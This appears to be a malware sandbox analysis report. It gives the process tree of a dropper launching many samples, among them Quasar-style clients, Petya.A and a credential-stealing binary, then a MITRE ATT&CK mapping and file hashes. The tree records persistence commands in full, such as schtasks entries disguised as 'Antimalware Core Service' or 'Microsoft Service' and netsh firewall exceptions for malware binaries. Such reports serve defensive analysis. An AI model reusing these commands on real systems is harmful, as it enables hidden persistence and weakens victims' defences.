      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2196
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Antimalware Core Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2680
- - C:\Users\Admin\AppData\Local\Temp\Files\cabal.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\cabal.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1228
  - - C:\Users\Admin\AppData\Local\Temp\Files\update.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\update.exe" mmoparadox
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:4060
- - C:\Users\Admin\AppData\Local\Temp\Files\Loader.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Loader.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:5016
  - - C:\Windows\SysWOW64\dialer.exe
      "C:\Windows\system32\dialer.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:324
- - C:\Users\Admin\AppData\Local\Temp\Files\Solara_Protect.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Solara_Protect.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3328
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows" /tr '"C:\Users\Admin\AppData\Local\Temp\Windows.exe"' & exit
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4768
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "Windows" /tr '"C:\Users\Admin\AppData\Local\Temp\Windows.exe"'
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:3500
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9C63.tmp.bat""
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1404
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:2456
    - - C:\Users\Admin\AppData\Local\Temp\Windows.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2016
- - C:\Users\Admin\AppData\Local\Temp\Files\ktyhpldea.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\ktyhpldea.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:1516
- - C:\Users\Admin\AppData\Local\Temp\Files\discord.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\discord.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1476
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Microsoft Service" /sc ONLOGON /tr "C:\Windows\system32\SubDir\main-pc.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3068
  - - C:\Windows\system32\SubDir\main-pc.exe
      "C:\Windows\system32\SubDir\main-pc.exe"
      4⤵
      Executes dropped EXE
      Drops file in System32 directory
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:3604
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Microsoft Service" /sc ONLOGON /tr "C:\Windows\system32\SubDir\main-pc.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3924
- - C:\Users\Admin\AppData\Local\Temp\Files\vanilla.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\vanilla.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:716
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5036
  - - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
      "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:4776
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:500
- - C:\Users\Admin\AppData\Local\Temp\Files\test.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\test.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:4904
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Windowns Client Startup" /sc ONLOGON /tr "C:\Windows\system32\Quasar\User Application Data.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4692
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8Sya4zCJnZCn.bat" "
      4⤵
      PID:4480
    - - C:\Windows\system32\chcp.com
        
        chcp 65001
        5⤵
        
        PID:1708
    - - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2548
    - - C:\Users\Admin\AppData\Local\Temp\Files\test.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\test.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:1880
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windowns Client Startup" /sc ONLOGON /tr "C:\Windows\system32\Quasar\User Application Data.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1128
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HXrG9gnAFl1n.bat" "
        6⤵
        
        PID:664
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:2424
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3268
        
        C:\Users\Admin\AppData\Local\Temp\Files\test.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\test.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:3840
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windowns Client Startup" /sc ONLOGON /tr "C:\Windows\system32\Quasar\User Application Data.exe" /rl HIGHEST /f
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5096
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7LVnG3eCuiOO.bat" "
        8⤵
        
        PID:2800
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:1020
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        9⤵
        
        PID:2228
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        9⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1820
        
        C:\Users\Admin\AppData\Local\Temp\Files\test.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\test.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:3340
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windowns Client Startup" /sc ONLOGON /tr "C:\Windows\system32\Quasar\User Application Data.exe" /rl HIGHEST /f
        10⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2548
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        11⤵
        
        PID:332
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wpj0lbLGqxU4.bat" "
        10⤵
        
        PID:4516
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        11⤵
        
        PID:2092
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        11⤵
        
        PID:1900
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        11⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2032
        
        C:\Users\Admin\AppData\Local\Temp\Files\test.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\test.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:3304
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windowns Client Startup" /sc ONLOGON /tr "C:\Windows\system32\Quasar\User Application Data.exe" /rl HIGHEST /f
        12⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3528
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        13⤵
        
        PID:1676
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jRhqVY61afYD.bat" "
        12⤵
        
        PID:3096
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        13⤵
        
        PID:3964
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        13⤵
        
        PID:2912
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        13⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1452
        
        C:\Users\Admin\AppData\Local\Temp\Files\test.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\test.exe"
        13⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4496
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windowns Client Startup" /sc ONLOGON /tr "C:\Windows\system32\Quasar\User Application Data.exe" /rl HIGHEST /f
        14⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4700
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        15⤵
        
        PID:3036
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UZafgdxO7pyZ.bat" "
        14⤵
        
        PID:4464
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        15⤵
        
        PID:2740
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        15⤵
        
        PID:1788
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        15⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:196
        
        C:\Users\Admin\AppData\Local\Temp\Files\test.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\test.exe"
        15⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1948
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windowns Client Startup" /sc ONLOGON /tr "C:\Windows\system32\Quasar\User Application Data.exe" /rl HIGHEST /f
        16⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:872
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        17⤵
        
        PID:4916
- - C:\Users\Admin\AppData\Local\Temp\Files\wudi.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\wudi.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Loads dropped DLL
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:880
- - C:\Users\Admin\AppData\Local\Temp\Files\PaoNan.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\PaoNan.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:4748
- - C:\Users\Admin\AppData\Local\Temp\Files\system404.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\system404.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:220
- - C:\Users\Admin\AppData\Local\Temp\Files\benpolatalemdar.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\benpolatalemdar.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:852
- - C:\Users\Admin\AppData\Local\Temp\Files\Security.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Security.exe"
    3⤵
    - Executes dropped EXE
    PID:3508
  - - C:\Users\Admin\AppData\Local\Temp\$77Security.exe
      "C:\Users\Admin\AppData\Local\Temp\$77Security.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of AdjustPrivilegeToken
      PID:5112
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77Security" /tr "C:\Users\Admin\AppData\Roaming\$77Security.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1176
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2772
  - - C:\Users\Admin\AppData\Local\Temp\Install.exe
      "C:\Users\Admin\AppData\Local\Temp\Install.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4508
- - C:\Users\Admin\AppData\Local\Temp\Files\AnyDesk.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\AnyDesk.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    PID:1660
  - - C:\Users\Admin\AppData\Local\Temp\Files\AnyDesk.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\AnyDesk.exe" --local-service
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:1476
  - - C:\Users\Admin\AppData\Local\Temp\Files\AnyDesk.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\AnyDesk.exe" --local-control
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:2080
- - C:\Users\Admin\AppData\Local\Temp\Files\executablelol.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\executablelol.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:812
- - C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:4836
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Microsoft" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Application Frame Host.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2796
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3332
  - - C:\Users\Admin\AppData\Roaming\SubDir\Application Frame Host.exe
      "C:\Users\Admin\AppData\Roaming\SubDir\Application Frame Host.exe"
      4⤵
      Loads dropped DLL
      PID:3972
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 3972 -s 188
        5⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:3872
- - C:\Users\Admin\AppData\Local\Temp\Files\mos%20ssssttttt.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\mos%20ssssttttt.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: GetForegroundWindowSpam
    PID:3328
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Files\mos%20ssssttttt.exe" "mos%20ssssttttt.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:1924
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1176
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\Files\mos%20ssssttttt.exe"
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:1192
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1408
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Files\mos%20ssssttttt.exe" "mos%20ssssttttt.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:4920
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:812
- - C:\Users\Admin\AppData\Local\Temp\Files\3.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\3.exe"
    3⤵
    - Executes dropped EXE
    PID:2396
  - - C:\Users\Admin\AppData\Local\Temp\Files\3.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\3.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2564
- - C:\Users\Admin\AppData\Local\Temp\Files\Destover.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Destover.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1052
- - C:\Users\Admin\AppData\Local\Temp\Files\donut.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\donut.exe"
    3⤵
    - Executes dropped EXE
    PID:1976
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1020
- - C:\Users\Admin\AppData\Local\Temp\Files\mnftyjkrgjsae.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\mnftyjkrgjsae.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1460
- - C:\Users\Admin\AppData\Local\Temp\Files\gem1.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\gem1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:4012
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1200
  - - C:\Users\Admin\AppData\Local\Temp\Files\gem1.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\gem1.exe"
      4⤵
      Executes dropped EXE
      PID:2276
  - - C:\Users\Admin\AppData\Local\Temp\Files\gem1.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\gem1.exe"
      4⤵
      Executes dropped EXE
      Accesses Microsoft Outlook profiles
      System Location Discovery: System Language Discovery
      outlook_office_path
      outlook_win_path
      PID:4984
  - - C:\Users\Admin\AppData\Local\Temp\Files\gem1.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\gem1.exe"
      4⤵
      Executes dropped EXE
      PID:1204
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 844
      4⤵
      Program crash
      Checks processor information in registry
      Enumerates system info in registry
      PID:1388
- - C:\Users\Admin\AppData\Local\Temp\Files\whats-new.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\whats-new.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:3752
- - C:\Users\Admin\AppData\Local\Temp\Files\daytjhasdawd.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\daytjhasdawd.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1864
- - C:\Users\Admin\AppData\Local\Temp\Files\Petya.A.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Petya.A.exe"
    3⤵
    - Executes dropped EXE
    - Writes to the Master Boot Record (MBR)
    PID:2720

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3420

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3468

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3812

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3860

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3928

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:3976

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4316

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4324

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:4844

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4796

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4240

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:2204

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4552

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2744

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Modifies data under HKEY_USERS
PID:4960

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
PID:1736

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:1112

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:2912
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4012 -ip 4012
  2⤵
  PID:1452

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Windows Credential Manager

T1555.004

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Client-built.exe.log

Filesize
1KB

MD5
b4e91d2e5f40d5e2586a86cf3bb4df24

SHA1
31920b3a41aa4400d4a0230a7622848789b38672

SHA256
5d8af3c7519874ed42a0d74ee559ae30d9cc6930aef213079347e2b47092c210

SHA512
968751b79a98961f145de48d425ea820fd1875bae79a725adf35fc8f4706c103ee0c7babd4838166d8a0dda9fbce3728c0265a04c4b37f335ec4eaa110a2b319

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\test.exe.log

Filesize
2KB

MD5
15eab799098760706ed95d314e75449d

SHA1
273fb07e40148d5c267ca53f958c5075d24c4444

SHA256
45030bd997f50bb52c481f7bc86fac5f375d08911bcc106b98d9d8f0c2ce9778

SHA512
50c125e2a98740db0a0122d7f4de97c50d84623e800b3d3e173049c8e28ff0fbe4add7677bc56cb2228f78ed17522f67ae8f1b85f62824012414ce38ce0b500c

Download Submit
C:\Users\Admin\AppData\Local\Temp\$77Security.exe

Filesize
54KB

MD5
12c1eb283c7106b3f2c8b2ba93037a58

SHA1
540fc3c3a0a2cf712e2957a96b8aff4c071b0e7e

SHA256
35eb77c5983a70f24ba87d96685d1e2911b523d5972dfcbccf3e549316ff16f1

SHA512
72d25cb84ba32b3680edbbf9be92ab279cb7caef6e166917ec68a7eb7c8530b926565faab8a98b05125ad16359149a86dee19b083531a21ac3b41f0c77c5349d

Download Submit
C:\Users\Admin\AppData\Local\Temp\8Sya4zCJnZCn.bat

Filesize
207B

MD5
767005f52c392ee3c6ef05881d2b8b80

SHA1
a017b2eb6be3954428dab34159394161e0be92ca

SHA256
c309002c09101a1763b86830d03bd24495658f385ae010e7c54d9e94f58f99cb

SHA512
49bb06a9120bfd7a01b8ac040a9f15138d1f0174ec8b2b86be51c46bddf926b2e747b51bb8eee2998dabde48e89adc9bcc732086b7b76e22a822c98c02bdeba1

Download Submit
C:\Users\Admin\AppData\Local\Temp\E_4\krnln.fnr

Filesize
1.1MB

MD5
71520e2e016f657e0131181c093af6e0

SHA1
98b542d747b2dfd57ea69e42ffc8e6a6f05d18cb

SHA256
c77f7719ef55800ebc692edb5523f6becd83bdc25b8bc6f7dbff3c6243ef76ae

SHA512
d48758acc8767a78b898152efac9ce31e043904dcaddc0e60c3145bc7250e8384913833f33f717d986f2f9262a3e82ecde13b4fbece851b2b8b70af43a177b71

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\02.08.2022.exe

Filesize
242KB

MD5
698103c5aee387f8609e1025bc337595

SHA1
57091882c3fff5bf019fb7df0dbf6c531c78ed8e

SHA256
faf1e5157e0dd8b4c18b45c84111a23474d474d6c301c3f95f2e727a5ad23c6a

SHA512
98993d14a4101b75a7c11e904ac0a509ceaf034aac796da53d0806f0363ca2bafd6cb542f917b26cc0fb4ed1fbf3e219f7f9bd3440030594ce146df1f94a03a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\3.exe

Filesize
18.3MB

MD5
bc446f5fd978cd8997f6c14842517075

SHA1
